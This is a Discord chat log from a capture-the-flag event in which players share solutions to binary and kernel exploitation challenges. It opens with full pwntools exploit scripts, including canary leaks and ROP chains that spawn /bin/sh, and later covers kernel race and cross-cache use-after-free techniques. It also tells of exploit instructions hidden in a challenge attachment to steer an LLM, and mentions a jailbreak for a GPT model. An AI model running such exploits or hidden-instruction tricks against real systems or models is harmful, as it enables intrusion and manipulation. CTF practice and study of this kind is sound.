  io.sendlineafter(b':', str(0).encode())
  io.sendlineafter(b':', b'3')
  io.recvuntil(b':')
  io.recvuntil(b':')

log.info(hex(libc.address))
log.info(hex(canary))

'''
0x001a2692: ret;
0x001157cc: pop rdi; ret;
'''
rop  = b''
rop += p64(libc.address+0x1157cc) + p64(next(libc.search(b'/bin/sh\x00')))
rop += p64(libc.address+0x1a2692) + p64(libc.sym.system)

io.sendline(b'A'*24 + p64(canary) + p64(0) + rop)

io.interactive()

how'd you guys do the message-store?
I found that I can call functions and etc
but couldn't figure it out from there

i didnt even try tbf im not good enuff at kernel to slop it

pwn/message

holy slop

message

#!/usr/bin/env python3
from pwn import *

exe  = context.binary = ELF(args.EXE or './challenge')
libc = ELF(exe.libc.path) if exe.libc else None

def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)

    else:
        return process([exe.path] + argv, *a, **kw)

gdbscript = '''
init-pwndbg
b *0x243a92
c
'''.format(**locals())

io = start() 

payload  = flat({
 0x00: p64(0),
 0x08: p64(0x2f9e38+0x290), 
 0x10: p64(8),
 0x18: p64(2),
 0x60: p64(0x243431)+p64(0x2f9e38+0x390),
 0x70: p64(0x24afca)+p64(0x2f9e38+0x390),
 0x80: p64(0x297260),
 0x88+0xa: p64(0x247566)+p64(0x2f9e38+0x390)+p64(0x2b4e72)+p64(0x242d78),
 0x1a0: p64(0xb6c200000000),
 0x1a8: p64(0x100),
 0x290: b'/bin/sh\x00'.ljust(8, b'\x00'),
})

io.sendlineafter(b'>', b"1")
io.sendlineafter(b'?', payload)
io.sendlineafter(b'>', b"2")
io.sendlineafter(b'>', str(3367).encode())
io.sendlineafter(b'>', b"3")

rop  = b''
rop += p64(0x24349d) + p64(0x2f9e38+0x290)
rop += p64(0x243431) + p64(0) + p64(0x2ed673)
rop += p64(0x249f2c) + p64(0x3b)
rop += p64(0x2a6602)

pause() ; io.sendline(rop)
io.interactive()

what was the strategy for message store? I could not figure out anything useful to call

gng what the fuck

just do memcpy gng

bro what

damn I was so close

i asked ai to add the pow solver it changed so much

did u upload the vm 400mb ??

any kernel writeup ??

message is just call do_exec and you can control rdi from rax+0x80:

def set_message(message):
    sla("> ", "1")
    sla("New Message? ", message)

def set_color(ind):
    sla("> ", "2")
    sla("> ", str(ind))

def print_message():
    sla("> ", "3")

set_message(p64(0x26de30) + b'\x00'*0x76 + p64(0x2f9ec2) + b'\x00' * 4 +b'/bin/sh\x00\x00\x00\x00\x00')

set_color(4778)

print_message()

this has to be ragebait bro

😭

bzImage was enough, didn't bother tbh

naah

i think you just uploaded the exploit

💀

this has to be it

16s

yea i saw that

it's pure rage bait

yeah there's no way

https://kqx.io/writeups/cornelslop/

no, blizzard employees only need 16 seconds to get the solve. thats what you all were doing wrong

KQX

KQX

KQX fan club

if you tried prompting better, it woulda solved

https://tenor.com/view/tsav1-gif-2414224290373943095

yeah suprised it was that fast, we did have a jailbreak for the new GPT 5.4 though

holy ragebait

i fell for it

bro ... ragebait failed

just give up

i told everyone at work

it's kinda pay2win + prompt engineering

i believed pwn was over for a whole hour

now i have to retract my statements

ngl i fell for it too

?

that shi is gonna crazy from finding 0day in web and solving kernel exp

what do you think about claude finding bugs in firefox tho?

does anyone have a solution that is more accessible to humans?

isn't that crazy

#pwn message

its prolly ragebait no way look at the master prompt

Are there easy approaches in rust binaries? (it was a nightmare for me)

don't disrespect the 🐐

throw a 🤖 (clanker) at it 💀

go to a church and pray

That was my approach (probably not enough).

Nothing is enough when facing rust

skill issue

i pulled an all nighter understanding rust internals

for the rust binary the easy approach here was ....don't look at the rust, just debug and when u see u have options it's a safe bet to try an option not in the list

at least that was my strat cos i wasn't gonna stare at rust 🤣

btw im curious about why sometimes rax, rsi are buffer

and sometimes they are heap?

tbf i didn't read the code and debug the shit out of it

From what I understood if you have non ascii byte in the buffer then it returns the buffer otherwise it copies it in the heap and replaces bad bytes

Not completely sure tho

i was confused why people were talking about rust all this time i totally forgot i wrote a rust pwn

#[inline(never)]
fn print_message() -> std::io::Result<()> {
    let message = String::from_utf8_lossy(BUFFER.get());
    // If `COLOR` is an invalid enum value, this goes OOB of the jump table
    let func = match get_color() {
        MessageColor::Red => Colorize::red,
        MessageColor::Green => Colorize::green,
        MessageColor::Yellow => Colorize::yellow,
        MessageColor::Blue => Colorize::blue,
        MessageColor::Magenta => Colorize::magenta,
        MessageColor::Cyan => Colorize::cyan,
        MessageColor::White => Colorize::white,
    };
    println!("{}", func(&*message));

    Ok(())
}

ahh ok

rust kernel pwn

next time

💀

other highlights from this challenge's source code:

garden wu ?

ggs the pwn was very fun, i pulled an allnighter, and i have an exam tmrw 😭

what's the source of get_color

But I don't understand why in the solution with the execvp of the other guy the pointer survives. Mine were all getting butchered by the from_utf8_lossy. I fucking hate rust

message store solver. curious if this was fully ai oneshotted or needed any manual work

loll i knew it, no way this random gadget exists for cow::

It's a bit 🤡 but llvm hates generating nice gadgets

a friend of mine one shotted it

💀

crazy shit

no wonder it has so many solves

Yeah assumed so

doing it yourself was fun tho

too much code tho :((

I spent an allnighter ropping manually 😔

and also that utf-8 restriction is gay

i was talking about the garden chall bro

ropping manually is fun 🤠

based opinion

i struggled more on the rust one

skill issue

im way better at heap-like than stack tbf

i was originally going to make it a jvm patch exploit but that would be waaaay more code

:)

skill issue

yummy

garden was a condensed version of a jvm

In hindsight knowing LLMs would be used i should have just -O and stripped it ah well :^)

https://tenor.com/view/ragebait-rage-bait-lol-lmao-gif-3554026694133497645

The axe forgets, but the tree remembers..

that would have been crazy tho

basically, but jvm uses like a million diff algos

it took me like 2h to find vuln

would have been crazy long if it was stripped

💀

so you spammed allocations to race between the 2 callbacks? Maybe I missunderstood something

Yeah problem is optimising for non-ai makes it suck for the people playing legit 😔

been saying this since day 1, its so hard to read stripped programs

If i host another CTF i'll probably pretend i'm writing a challenge in 2025 and not look at solve times 😌

like i get it if its a job but ctfs are supposed to be fun

mostly to be sure that the second deletion happens on a different core

[profile.release]
opt-level = 1
strip = "none"
debug-assertions = false

🫡

ok, I managed to put the cpu running check_entry in sleep mode instead

skill issue

https://tenor.com/view/memes-meme-memes-goofy-ahh-pictures-lion-roar-lion-king-gif-13220042870582311261

dont even try the ragebait

bro i was gonna make mom jokes and realized it's a ctf discord server

:((

excellent self control

https://tenor.com/view/positive-thoughts-responsible-personal-power-self-own-accountable-gif-13218576913255554464

https://tenor.com/view/cat-sleepy-sad-i-must-contain-myself-restrain-myself-gif-16218722725677959928

next time let challenge binary < 2mb dogbolt isn't accepting those ( i don't love using cutter for decompiling )

try this

go to ur vm

ghidra?

open binary in ghidra/ida

and read the code

instead of copying and pasting into claude ... asking it to "make code readable"

lmao

i don't use ghidra tbh i don't love the theme i have ghidra in cutter

Just use binary ninja

embrace binary ninja

who tf uses binja dude

me

i use only ida free lol

crazy

IDA 9 Beta is free everyone

try ida 😭

i use it for patching

IDA is 🤢

Thank you hexrays employee who put his dstore online

peak

it has nice functionality for that, besides that IDA go brrrr

[dicegang does not endorse piracy]

Does it offer better decompilation?

hey btw can you give us ur opinion of the anthropic thing?
curious about what you think.

what is ts ida hhate

Im happy with the HLIL

there goes our hexrays sponsorship

Oh the firefox thing? I havent taken a look at it lol

waaaaay better

nah

Interesting

yea

it found like 22 or something bugs

binja clears ida in 2026 🙂

in two weeks i think

I just shitpost around with it and say AGI is here time to learn plumbing boys

binja free < ida free tho

no seriously

Now when i fell for the cornelslop ragebait i actually thought AGI is here

what do you think?

i cant be bothered to pirate

Hmm I will read through it and let you know then

I think the firefox thing is a little bit overhyped but that could be cope

the last anthropic post i wasnt very impressed

great

yeaa this one was very vague too

just telling that they found bugs and blah blah

$4k and only two bugs got made into exploits

but still .. it did find the bugs tho

Oh then if its similar and like that

how do u even catch up w ai tho, i need to start kernel its so demotivating

then i think it still has ways to go

but maybe its just the new fuzzing lol

it found 22 vulns in two weeks
i don't think it's overhyped at all

maybe

they didn't really give much details

so we can only assume

14 of which were critical vulns

same situation. I sadly think there is no hope and this situation can only get worse with time

Finding crits in firefox is not that hard imo. Idk, will be interesting to see if it keeps finding things

^^

yea that's true

Firefox is not hammered away by people like Chrome

yeaaa sure ...

that's copium i think

firefox is right after chrome when it comes to most hammered away software imo

maybe not right after but it's up there

It's a big gap, at least in terms of public research

I wouldn't know what the private labs are doing tho 😶‍🌫️

still it's a very big deal

maybe it's just a publicity stunt? maybe it's not just opus looking at the firefox code

maybe they are fuzzing and using opus to look at crashes

and hyping it like that

to bump up the stock priices or something

Or Anthropic steals the bugs people find using Claude 👀

can't be

They wouldn't right

😆

I doubt opus is better at triaging crashes than finding them (amongst a sea of false positives)

I mean if you hire the most talented developers/hackers and spend 10k in compute. You are very likely to find something

i mean they didn't give any details about how they used there models and if it was guided or unguided or any technical details

I had to work with someone to triage fuzzing crashes a few months ago and bro would only have cursor read and triage syzlang logs then proceed to post an official issue

ts pmo

fr

because it was all nonsense 😭

that's crazy

😭

most issues reported by him tho

lmfao

he was AGENTIC 🤓

They share places and endpoints where vulns exist but no prompt

it's not the prompt im interested in

because models produce different output on the same prompt

it's HOW they used there model opus ... was it guided somehow? what were the tools it was given? was it pure static analysis? or what?

they gave absolutely no details .. which is disappointing

that's crazy

I don’t think they can share this it will cause serious problems with other companies ppl will just go to ai and give it the same ( if it’s ai)

@strange pecan I liked the kernel challenge. Thank you for writing it!

goat

will we see ur writeup? 👀

@pure cipher

IMO the actual signal from the ant.dev firefox story is:

• Opus 4.6 is able to write a SpiderMonkey exploit when given a very good bug (like, in this case, a type confusion that instantly leads to addrof/fakeobj prim). No exploits coined for other harder bugs yet.
• ... and only once in 350 rollouts.
• ... but we all know some hammer that probably can make it nearly 95% in the near future.

i think they said that in the blog post

yeah i'll write one my code is messy tho

Thank you! Im glad you enjoyed it 🥳

btw i wanted to ask you something ... can i dm?

it's about this talk you gave:
2023: "Deep-Kernel Treasure Hunt: Finding exploitable structures in the Linux kernel" by Yudai Fujiwara
https://archive.codeblue.jp/2023/result/pdf/cb23-deep-kernel-treasure-hunt-finding-exploitable-structures-in-the-linux-kernel-by-yudai-fujiwara.pdf
https://www.youtube.com/watch?v=mamm_23fHD4

LLM before gpt 5.4 had these limitations, but after using 5.4 myself, I think that the day may come soon when I can perfectly analyze bug reports for the Linux kernel and even write perfect patches

omg its the guy in the tweet

The gremlin inside my brain won't stop thinking about this, I was forced ... send help

Ah yes, understandable.
Look at this, I think I have found an easier path to the flag

easier

my solves :p

What was the intended way to get a uaf in cornelslop?

Is it the thing leave did?

where was the garden vuln?

i did a cursed thing where i hung 600 threads in sha256_va_range

then selectively deleted mmap regions to triggered ordered frees for cross cache

Ooo is that to reach the cap and forcefully end the grace period?

gc

i found it with afl

so there is a cap?

the kqx exploit showcases the intended way

wdym by this

to get around the 128 limit

i started ~600 threads one by one to hang them in add_entry -> sha256_va_range

then deleting the range causes it to bail out early and kfree the entry

so setting up different threads with different ranges allows us to control how they get freed

Ah i see

The kqx trick with cpu cores is intended

nice

Im assming thread assignment gets balanced across cores so that creates the same effect

@strange pecan ur chall has a writeup

available

sorry man

Yea thats fine lol

https://kqx.io/writeups/cornelslop/

Ya its a good writeup and pretty much the intended

Once you get UAF there are a million ways to go 🙂

maybe next time try chrome ?

it will be huge chall for you

i used the kfree technique from corphone

since slowing down the checking allows easy double free

that's crazy

oh thats a clean exp then

lol remote stability for me was like 50%

race window on my local laptop was 10 times larger 🤣

i only needed to change my timings a little bit

the biggest issue was having 600 threads all running on the system was slowing things down by a scary amount on remote

when ai one shots this AGI has come and I will quit computers and buy a farm

or maybe optimus robots will run all farms by then

guess i shall gamble away everything on polymarket instead

xd

Can you please share your attachment🥺

It was fake lmao

He wrote an exploit and asked LLM to sloppify it

For the kernel chal,
We were stucked with 128 limit but @hallow narwhal 's Agent took 4 hours to found how to cross cache from scratch at it's 15th iteration....
However we don't trust LLM so we **NEVER **checked the progress....

Actually the Agent automatically find the UAF itself, finished the cross cache but end up to msg_msg (since we feed to many old kctf examples)... All progress has been dynamically verified with c PoC....

Yes this

I sloppified the actual exploit than hid it in one of the uploaded attachments. The hidden "jailbreak instructions" just tell it to copy and paste the exploit from the attachments

I initially submitted it in a ticket to troll the organizers, but apparently it hit a bit too hard.
Sorry for anyone I gave an existential crisis

Ah okok, I thought you spawned a lot to reach the cap of maximum rcu entries and force the grace period to end

But maybe that cap was way higher, I don't remeber

hm didnt know you could do that

but mprotecting the region in a loop on another thread seemed to do the trick

Yeah I did the same

How did you find that tecnique? Bc I found it after an extremely long conversation with gemini, but didn't manage to find it anywhere online

claude xd

No it was spoken

Via ptr

Yodai

i asked it to find ways to sleep or otherwise interrupt in the middle of the sha256_vm_range function

it suggested uffd/fuse first, then some fs stuff

i told it those werent available and the fs was all in memory initramfs

then it gave the mmap lock contention method

Im wondering if llms keep this evolvment many people will lose their jobs

is this the jann horn thing

....

send?

https://project-zero.issues.chromium.org/issues/423023990

oops wrong link

https://projectzero.google/2025/08/from-chrome-renderer-code-exec-to-kernel.html

he makes mprotect do a big PT walk and the page fault has to wait for it to release the lock

yes

i attempted this briefly but i couldn't get it working with limited memory